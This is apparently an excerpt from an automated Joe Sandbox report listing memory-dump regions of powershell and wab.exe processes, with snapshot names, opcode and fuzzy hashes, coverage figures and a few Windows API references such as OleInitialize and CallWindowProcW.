                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl
                                                          • API String ID: 0-2123353879
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:10%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:21
                                                          Total number of Limit Nodes:1
                                                          [Execution graph node and edge listing omitted; API calls labelled on its nodes: OleInitialize, CallWindowProcW]
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Rendered control-flow graph omitted; legend: Executed / Not Executed. The node listing begins at node 1475, 28af89e0-28af89fd.]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb2892928afe36137d55fc33cc4e20875183eda014ff4294e4bfde916a7257b1
                                                          • Instruction ID: 4ed14c811f4c6d31e8a80e8bbc7f3dec57934908a73d8050b291d2db1a6c72a7
                                                          • Opcode Fuzzy Hash: cb2892928afe36137d55fc33cc4e20875183eda014ff4294e4bfde916a7257b1
                                                          • Instruction Fuzzy Hash: AC920434A01214CFDB24DF68C588B89BBF2FB49315F5485A9E409AB352DB36ED85CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c364b85c823860717005cf8d112c2c13756ab64390e3b40b783d65895fccaf3
                                                          • Instruction ID: 71d3971546e6aa9855f181c8701301983abdf4211ce6cd99314928fc67393687
                                                          • Opcode Fuzzy Hash: 6c364b85c823860717005cf8d112c2c13756ab64390e3b40b783d65895fccaf3
                                                          • Instruction Fuzzy Hash: 97227C30B01209DBEB10DB68D48079DB7B2FB99310F248936F509EB792DE76DD918B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae57d493c33b7dd63523210ed7362240bbc8bcb79d1945681f18854bba4f0321
                                                          • Instruction ID: 9b6f8a909774a30465c12cbc2ee09957003596422cc5c8fa0fa471d58d85fcbd
                                                          • Opcode Fuzzy Hash: ae57d493c33b7dd63523210ed7362240bbc8bcb79d1945681f18854bba4f0321
                                                          • Instruction Fuzzy Hash: 9C324030E10719CBDB15EB79D890A9DB7B2FFD9300F60C669E409AB211EF31A985CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b037ab6e72475e894f491e2f0d3ba03bccb0417f5a8903b9a5c3b0b68e8f9bba
                                                          • Instruction ID: 03730c6e55a83492e739bebee71d4523a120d581bdbde7953341e1f9493c8ea6
                                                          • Opcode Fuzzy Hash: b037ab6e72475e894f491e2f0d3ba03bccb0417f5a8903b9a5c3b0b68e8f9bba
                                                          • Instruction Fuzzy Hash: 2B025A30B022059BDB14EB69D494B9EB7F2FF88310F248569E505AB395DF36ED42CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93f75acc3fc36ece5b53207228c88c432910afd11e27bc7058eb5498f05e2cbd
                                                          • Instruction ID: cc6e51a9388d8079cd644f351fa9766d050e2fdda24c926c17fec7bd3fc86f69
                                                          • Opcode Fuzzy Hash: 93f75acc3fc36ece5b53207228c88c432910afd11e27bc7058eb5498f05e2cbd
                                                          • Instruction Fuzzy Hash: 2CB14DB0E40209CFDB50DFA9D8857DEBBF2AF88318F14D129DA15A7294EB749845CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfcc3482c99a55ae0c67a97bd4c63064682bf253fecb662da73637f9e5fab6c6
                                                          • Instruction ID: fa59e7a055c865df2543cd624a0ec1cef88f4d199c6ec033d810eae183aedf8d
                                                          • Opcode Fuzzy Hash: bfcc3482c99a55ae0c67a97bd4c63064682bf253fecb662da73637f9e5fab6c6
                                                          • Instruction Fuzzy Hash: DAB1A170E00209CFDB50CFA8C8957DEBBF2AF88318F14D129D615EB294EB759845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cd554eeed428d9d8be468e0d7ae1be5b3dc6cf85cbfd2b30a5f6ca9eca7d1d7
                                                          • Instruction ID: 2177430a5d1931fe410b0e87fe48e64b817f2d2f390ba5182986f6f54b57ecb8
                                                          • Opcode Fuzzy Hash: 1cd554eeed428d9d8be468e0d7ae1be5b3dc6cf85cbfd2b30a5f6ca9eca7d1d7
                                                          • Instruction Fuzzy Hash: 6F916971E40209CFDF50CFA9C8857DEBBF2AF88308F14D529E605AB294EB749845CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dM$dM
                                                          • API String ID: 0-2801238145
                                                          • Opcode ID: f0e6f3487e4ba9144dc088e4fb69ec0a3449703e61b36ee28ffac163732c5bcf
                                                          • Instruction ID: 10f31239c8e4f24932b8fb8e160e1d110b2e559706399c122bcebd16d92ccd7b
                                                          • Opcode Fuzzy Hash: f0e6f3487e4ba9144dc088e4fb69ec0a3449703e61b36ee28ffac163732c5bcf
                                                          • Instruction Fuzzy Hash: 77E16B70A01209CBEB14DBA8D48079EB7B2FF98300F608539E409AB355DF76E952CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dM$dM
                                                          • API String ID: 0-2801238145
                                                          • Opcode ID: 2d46be2ed7bdda4b5a73e3d3d27c72cdb7c843a3d96a76ec35e7685e6e14a5e4
                                                          • Instruction ID: ccd8c025a0d0a01e19e96e4bec74e90b4313ab369d7c580b823c855f04167905
                                                          • Opcode Fuzzy Hash: 2d46be2ed7bdda4b5a73e3d3d27c72cdb7c843a3d96a76ec35e7685e6e14a5e4
                                                          • Instruction Fuzzy Hash: CCA13A70B012158FEB14EB79C490BAEB7F2EF89300F5085A9D409AB351DF769D868B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 28AE1141
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 2db63ab327b5c508968988aa40c005d11cca3b8251d04bad64ddcaf18c96075a
                                                          • Instruction ID: 19fea7a092303181024827c3ceac4bd7277da68cb8565191fd4c15c62814ef11
                                                          • Opcode Fuzzy Hash: 2db63ab327b5c508968988aa40c005d11cca3b8251d04bad64ddcaf18c96075a
                                                          • Instruction Fuzzy Hash: CB4117B8A00259DFDB04CF99C484B9ABBF5FF88311F248559E519AB321D774A941CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 5c43fabbac58ab2afdc72e1d8a2d15a3385fe7b8f467b4d89d1e86615b67c192
                                                          • Instruction ID: 64427cb712efef92753970748f61d4f181d5a1ef3a8042a47e11861ddc5ccd9f
                                                          • Opcode Fuzzy Hash: 5c43fabbac58ab2afdc72e1d8a2d15a3385fe7b8f467b4d89d1e86615b67c192
                                                          • Instruction Fuzzy Hash: 09C13834A01204CBDB14DBA9D584B9DBBF2FB98311F288529E505EB391DF3ADD82CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 28AE360D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 90ff713845c9e6dbddf0c4b6485b95e64a3734514d91c89933953cbc79ffaa3f
                                                          • Instruction ID: 0c085d3c25c1ed1152419397b6354a7fa6f13a1ff3f07818505b544466a6c51c
                                                          • Opcode Fuzzy Hash: 90ff713845c9e6dbddf0c4b6485b95e64a3734514d91c89933953cbc79ffaa3f
                                                          • Instruction Fuzzy Hash: 2D1122B58042498FDB20DFAAD484BDEFFF4EB48310F24855AD459A7210D3B4A540CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 28AE360D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: f79a9366d75662df83b125b6d03fa5234e29777a5106138222c4d8152fc3df77
                                                          • Instruction ID: e882e03e07c84cfa70bd3d48d3173888c4eaa59d5fdf96f59498e58ff4c50c1d
                                                          • Opcode Fuzzy Hash: f79a9366d75662df83b125b6d03fa5234e29777a5106138222c4d8152fc3df77
                                                          • Instruction Fuzzy Hash: 361103B59046498FDB20DFAAD484B9EFBF4EB48210F24846AE519A7300D774A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bcb7d73d17bbcf44deea50e27c394ef14ae770f979c228f0e73571d195e6353
                                                          • Instruction ID: 88982e977bb871d685bc3e7460ff5ba7d845f2df7d59100cc44b69fa3673b257
                                                          • Opcode Fuzzy Hash: 3bcb7d73d17bbcf44deea50e27c394ef14ae770f979c228f0e73571d195e6353
                                                          • Instruction Fuzzy Hash: C5822C74A012149FDB24DB28C590A6E77F3FF88701F9094AADA06A7390DF79AD81CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1302cfac8cd502fbdaa45afe009f467475bf7cda66981d4195e408427cb22f0
                                                          • Instruction ID: c8a34803d2f80bf401d63b599931072b056b423266daa5c8df2046598e9170f9
                                                          • Opcode Fuzzy Hash: f1302cfac8cd502fbdaa45afe009f467475bf7cda66981d4195e408427cb22f0
                                                          • Instruction Fuzzy Hash: 47626B30A003098FDB15EB68D580A9EB7F2FF88305B64DA68D105AF365DB75ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a99627511175075dba52aa937726a46c40d971ec06e48a2551ee7eb707d87c2
                                                          • Instruction ID: ea89d8a659415dd790c6d6b9ae0bae248e359ad769544c9dd6f8fd36efa22c5a
                                                          • Opcode Fuzzy Hash: 2a99627511175075dba52aa937726a46c40d971ec06e48a2551ee7eb707d87c2
                                                          • Instruction Fuzzy Hash: 9022B3B07003059BDB259B38D48536D37A3FBCE318B609929E105EB355CF7ADD868B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4c16d40f084400ab1cf7276e71a087ec512da534b4f4ee5b2e970b3f87728ee
                                                          • Instruction ID: 48fb0a452408a197a39f6f6ba33a9502096bab8c7094bcd5a47bd66ff645ffe5
                                                          • Opcode Fuzzy Hash: d4c16d40f084400ab1cf7276e71a087ec512da534b4f4ee5b2e970b3f87728ee
                                                          • Instruction Fuzzy Hash: 61026B30A02209CFDB14CBA8D48079DB7B2FB59310F24857AE419EB652DF76DE81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7acf1310f030f07577febd2c58cb21d66f87331dcac71f03b5009eb4ca5282e6
                                                          • Instruction ID: 19af7ef1353cb1916b559517497decbec376cdbb14514e38cf1235a1be876984
                                                          • Opcode Fuzzy Hash: 7acf1310f030f07577febd2c58cb21d66f87331dcac71f03b5009eb4ca5282e6
                                                          • Instruction Fuzzy Hash: 07E18C30B002048FDB54DF78D4906AEB7F2AF88314F589569E606DB3A1EB75ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bfef54c2434157c9e706996192b34dfb1d4af070ff3d3f3bb0fea84c1ad6167
                                                          • Instruction ID: 3c5a1155da5fa4100591b33333b4835dce5444dce6c7f00d84b674d6991f822e
                                                          • Opcode Fuzzy Hash: 8bfef54c2434157c9e706996192b34dfb1d4af070ff3d3f3bb0fea84c1ad6167
                                                          • Instruction Fuzzy Hash: 70D17D30B002049FDB54EB68D484BADB7F3FB88314F549569EA09AB351DB35ED45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
